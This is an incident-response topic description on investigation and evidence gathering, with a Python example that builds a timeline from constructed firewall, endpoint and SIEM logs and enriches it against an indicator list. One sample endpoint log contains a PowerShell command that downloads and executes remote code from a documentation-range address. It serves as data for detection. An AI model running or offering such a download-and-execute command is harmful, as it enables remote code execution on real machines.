Investigation and Information Gathering Questions
Skills and methods for systematically collecting, validating, and organizing information during investigations and when clarifying ambiguous situations.

Covers technical evidence collection: gathering relevant logs from SIEM (security information and event management) systems, firewalls, endpoints, applications and other telemetry; correlating data across sources; building timelines of events; identifying affected systems and users; and preserving evidence and chain of custody where required.

Also covers threat context and enrichment, for example determining whether an external IP address or other indicator is known to be malicious, and whether observed patterns match known threat actors.

Includes the communication and clarification side of information gathering: asking targeted clarifying questions of stakeholders, understanding which factual details matter for legal or business analysis, prioritizing missing information, working effectively with incomplete data, and obtaining necessary inputs from business owners in a time-efficient manner.

Emphasizes judgment about direct evidence versus circumstantial information, efficient triage and prioritization of collection steps, and balancing technical, legal, and business concerns when assembling a coherent investigation narrative.
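The cross-source correlation, timeline-building and indicator-enrichment steps described above, as an added example that is not part of the original page. It ingests constructed firewall, endpoint and SIEM records (hypothetical hosts and users, RFC 5737 documentation addresses), normalizes their differing timestamp formats to UTC so that sorting is meaningful, joins firewall destination IPs to hostnames through a constructed asset inventory, tags events whose external address appears in a constructed indicator list, and derives the affected hosts and users. The asset table, indicator list and timezone-abbreviation map are assumptions made for the example, not data from any real environment.

```python
"""Correlate constructed firewall, endpoint and SIEM records into one UTC timeline.

All log lines, hosts, users and addresses below are constructed for illustration.
"""
import json
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Constructed asset inventory (internal IP -> hostname) and indicator list.
ASSETS = {"10.0.0.12": "ws-012", "10.0.0.30": "srv-030"}
IOCS = {"203.0.113.45": "reported C2 address (constructed entry)"}

# Constructed sample telemetry. Each source uses a different timestamp
# convention (ISO-8601 UTC, local time with abbreviation, epoch seconds),
# which is the usual normalization problem in cross-source correlation.
FIREWALL_LOGS = [
    "2024-05-01T10:02:14Z src=203.0.113.45 dst=10.0.0.12 dport=443 action=ALLOW",
    "2024-05-01T10:02:20Z src=203.0.113.45 dst=10.0.0.12 dport=22 action=ALLOW",
    "2024-05-01T10:05:01Z src=198.51.100.7 dst=10.0.0.30 dport=443 action=DENY",
]
ENDPOINT_LOGS = [
    "May 01 2024 06:02:25 EDT host=ws-012 user=jdoe process=powershell.exe "
    "cmd=\"iex (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')\"",
    "May 01 2024 06:02:31 EDT host=ws-012 user=jdoe process=cmd.exe cmd=\"whoami\"",
]
SIEM_ALERTS = [
    '{"ts": 1714557742, "rule": "Failed logon burst", "host": "ws-012", '
    '"user": "jdoe", "src_ip": "203.0.113.45"}',
]

# Assumed offsets; real abbreviations are ambiguous, so prefer numeric offsets.
TZ_OFFSETS = {"EDT": -4, "EST": -5, "UTC": 0}
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
ENDPOINT_RE = re.compile(r"^(\w{3} \d{2} \d{4} \d{2}:\d{2}:\d{2}) (\w+) (.*)$")


@dataclass
class Event:
    ts: datetime              # timezone-aware
    source: str
    host: Optional[str]
    user: Optional[str]
    remote_ip: Optional[str]  # external address tied to the event, if any
    summary: str
    ioc: Optional[str] = None # indicator description once enriched


def parse_kv(text):
    """Parse key=value pairs; values may be double-quoted."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in KV_RE.finditer(text)}


def parse_firewall(line):
    ts_text, rest = line.split(" ", 1)
    ts = datetime.fromisoformat(ts_text.replace("Z", "+00:00"))
    kv = parse_kv(rest)
    # Join the internal destination IP to a hostname via the asset inventory
    # so the firewall event can be lined up with endpoint telemetry.
    return Event(ts, "firewall", ASSETS.get(kv["dst"]), None, kv["src"],
                 f"{kv['action']} {kv['src']}->{kv['dst']}:{kv['dport']}")


def parse_endpoint(line):
    m = ENDPOINT_RE.match(line)
    naive = datetime.strptime(m.group(1), "%b %d %Y %H:%M:%S")
    ts = naive.replace(tzinfo=timezone(timedelta(hours=TZ_OFFSETS[m.group(2)])))
    kv = parse_kv(m.group(3))
    # Pull an IP literal out of the command line so a download from a
    # suspicious address can be matched against the indicator list.
    ip = IP_RE.search(kv.get("cmd", ""))
    return Event(ts, "endpoint", kv["host"], kv["user"], ip.group(0) if ip else None,
                 f"{kv['process']} {kv['cmd']}")


def parse_siem(line):
    rec = json.loads(line)
    return Event(datetime.fromtimestamp(rec["ts"], tz=timezone.utc), "siem",
                 rec.get("host"), rec.get("user"), rec.get("src_ip"), rec["rule"])


def build_timeline(fw_lines, ep_lines, siem_lines, iocs=IOCS):
    """Parse every source, enrich against indicators, and order by UTC time."""
    events = ([parse_firewall(l) for l in fw_lines]
              + [parse_endpoint(l) for l in ep_lines]
              + [parse_siem(l) for l in siem_lines])
    for e in events:
        e.ioc = iocs.get(e.remote_ip)
    events.sort(key=lambda e: e.ts)  # aware datetimes compare across offsets
    return events


def affected(events):
    """Hosts and users touched by at least one event tied to a known indicator."""
    hosts = {e.host for e in events if e.ioc and e.host}
    users = {e.user for e in events if e.ioc and e.user}
    return hosts, users


def render(events):
    return [f"{e.ts.astimezone(timezone.utc).strftime('%Y-%m-%dT%H:%M:%SZ')} "
            f"{e.source:8} {e.host or '-':8} {e.user or '-':6} "
            f"{'[IOC] ' if e.ioc else ''}{e.summary}" for e in events]


if __name__ == "__main__":
    tl = build_timeline(FIREWALL_LOGS, ENDPOINT_LOGS, SIEM_ALERTS)
    print("\n".join(render(tl)))
    print("affected hosts/users:", affected(tl))
```

Note that the second endpoint record (`whoami`) is not flagged on its own, because it carries no indicator; it is still attributed to the affected host and user through the surrounding events, which is the distinction between direct evidence and circumstantial context the topic above calls out. In a real investigation the asset mapping and timezone handling are the first things to verify, since a stale inventory or a mis-resolved abbreviation silently misorders the timeline.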